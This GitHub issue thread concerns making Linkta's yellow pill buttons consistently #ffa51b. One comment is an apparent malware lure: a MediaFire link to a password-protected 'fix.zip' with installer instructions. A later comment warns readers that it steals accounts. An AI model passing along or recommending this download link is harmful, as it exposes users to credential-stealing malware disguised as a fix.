### ISSUE TITLE
Yellow Pill Buttons and other Linkta Yellow elements - Color Consistency

### ISSUE THREAD

**Issue by relandboyle** [Linkta-org/core#385]
**Related User Story**
Most yellow elements should be color #ffa51b in their default state, darker or lighter on hover.

**Related Tickets**

**Acceptance Criteria**

**Subtasks**
<!-- If necessary, break down the ticket into smaller, actionable subtasks. Create issues accordingly.>

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.
